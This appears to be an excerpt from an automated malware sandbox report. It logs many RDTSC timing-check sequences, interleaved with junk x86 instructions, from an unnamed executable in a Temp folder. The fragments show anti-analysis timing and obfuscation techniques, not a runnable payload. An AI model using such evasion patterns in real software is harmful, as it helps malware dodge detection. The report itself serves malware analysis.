                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3003D second address: 4C3009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F29F0CD52A1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov bx, si 0x00000014 pushfd 0x00000015 jmp 00007F29F0CD52A8h 0x0000001a adc ecx, 5F72FF58h 0x00000020 jmp 00007F29F0CD529Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3009D second address: 4C300A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C300A1 second address: 4C300A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C300A5 second address: 4C300AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C300AB second address: 4C300E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F29F0CD52A8h 0x00000008 pop ecx 0x00000009 mov dh, D5h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29F0CD52A9h 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BB0C4F second address: 4BB0C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BB0C55 second address: 4BB0CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dh, 13h 0x0000000d pushfd 0x0000000e jmp 00007F29F0CD529Ah 0x00000013 adc si, 2B98h 0x00000018 jmp 00007F29F0CD529Bh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F29F0CD52A4h 0x00000027 adc si, 55F8h 0x0000002c jmp 00007F29F0CD529Bh 0x00000031 popfd 0x00000032 pushad 0x00000033 movzx eax, dx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BB0CB6 second address: 4BB0CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 jmp 00007F29F0C52767h 0x0000000d push dword ptr [ebp+04h] 0x00000010 pushad 0x00000011 jmp 00007F29F0C52764h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BB0D4B second address: 4BB0D64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BB0D64 second address: 4BB0D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BB0D68 second address: 4BB0D85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE0AB9 second address: 4BE0ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE0ABD second address: 4BE0AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE0AC3 second address: 4BE0B33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C5275Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov ecx, edi 0x00000013 popad 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F29F0C5275Ch 0x0000001f or ax, 03C8h 0x00000024 jmp 00007F29F0C5275Bh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F29F0C52768h 0x00000030 jmp 00007F29F0C52765h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE0B33 second address: 4BE0B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE0B39 second address: 4BE0B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C308AF second address: 4C308B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C308B5 second address: 4C308F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29F0C5275Ch 0x00000009 jmp 00007F29F0C52765h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov di, 6F7Ah 0x0000001a jmp 00007F29F0C5275Bh 0x0000001f popad 0x00000020 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C308F2 second address: 4C3093F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushfd 0x00000007 jmp 00007F29F0CD529Bh 0x0000000c add ax, 67CEh 0x00000011 jmp 00007F29F0CD52A9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F29F0CD52A1h 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3093F second address: 4C30943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30943 second address: 4C30956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30956 second address: 4C3095C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3095C second address: 4C3096C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3096C second address: 4C30970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30970 second address: 4C30988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30988 second address: 4C309BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 call 00007F29F0C5275Dh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f pushad 0x00000010 mov ch, dl 0x00000012 call 00007F29F0C52766h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C307F2 second address: 4C30826 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 call 00007F29F0CD52A1h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ecx, 6E856563h 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f movsx edi, cx 0x00000022 mov ecx, 11FEA745h 0x00000027 popad 0x00000028 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30826 second address: 4C3082B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3082B second address: 4C30868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD52A7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F29F0CD52A6h 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30868 second address: 4C3086C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3086C second address: 4C30889 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C306B2 second address: 4C306C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0C5275Ch 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C306C2 second address: 4C30718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F29F0CD52A6h 0x00000013 mov ebp, esp 0x00000015 jmp 00007F29F0CD52A0h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F29F0CD52A7h 0x00000022 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0CAB second address: 4BF0CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0CB0 second address: 4BF0CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD529Bh 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0CBF second address: 4BF0D1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F29F0C52761h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F29F0C5275Eh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F29F0C52767h 0x00000020 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0D1A second address: 4BF0D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0D20 second address: 4BF0D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0D24 second address: 4BF0D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0D28 second address: 4BF0D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29F0C5275Ah 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0D3D second address: 4BF0D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0D43 second address: 4BF0D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30CBA second address: 4C30CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30CBE second address: 4C30CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30CC4 second address: 4C30D33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F29F0CD52A1h 0x00000011 adc si, E256h 0x00000016 jmp 00007F29F0CD52A1h 0x0000001b popfd 0x0000001c mov ecx, 07480FC7h 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F29F0CD529Ah 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F29F0CD52A7h 0x00000031 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30D33 second address: 4C30D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29F0C52768h 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30D59 second address: 4C30D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax], 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov di, 3314h 0x00000015 push edx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30D71 second address: 4C30D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d pushad 0x0000000e mov di, si 0x00000011 mov bh, ah 0x00000013 popad 0x00000014 pop ebp 0x00000015 pushad 0x00000016 mov cx, bx 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop esi 0x0000001d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE09B2 second address: 4BE09B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE09B9 second address: 4BE0A0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007F29F0C5275Dh 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F29F0C52767h 0x00000018 push ecx 0x00000019 pop ebx 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F29F0C52760h 0x00000024 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30150 second address: 4C30182 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F29F0CD529Eh 0x00000013 xor ch, FFFFFF98h 0x00000016 jmp 00007F29F0CD529Bh 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10BAC second address: 4C10BCA instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ecx 0x00000009 jmp 00007F29F0C5275Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10BCA second address: 4C10BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10BCE second address: 4C10BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10BEB second address: 4C10C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F29F0CD52A2h 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 call 00007F29F0CD529Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10C1C second address: 4C10C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov ebx, 2EAF4134h 0x0000000a popad 0x0000000b and dword ptr [eax], 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10C30 second address: 4C10C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10C34 second address: 4C10C48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52760h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10C48 second address: 4C10C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD529Eh 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C10C5A second address: 4C10C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC01BC second address: 4BC01C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC01C1 second address: 4BC01C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC01C7 second address: 4BC01CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC01CB second address: 4BC0205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F29F0C5275Ah 0x0000000e mov ebp, esp 0x00000010 jmp 00007F29F0C52760h 0x00000015 and esp, FFFFFFF8h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007F29F0C5275Dh 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC0205 second address: 4BC024A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov dl, FDh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F29F0CD52A3h 0x00000014 sbb cx, 47AEh 0x00000019 jmp 00007F29F0CD52A9h 0x0000001e popfd 0x0000001f movzx eax, dx 0x00000022 popad 0x00000023 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC024A second address: 4BC0250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC0250 second address: 4BC0254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC0254 second address: 4BC0295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bh, FFh 0x0000000c mov si, 2C79h 0x00000010 popad 0x00000011 xchg eax, ecx 0x00000012 pushad 0x00000013 mov ecx, 3950F1B1h 0x00000018 jmp 00007F29F0C5275Eh 0x0000001d popad 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F29F0C52767h 0x00000026 rdtsc
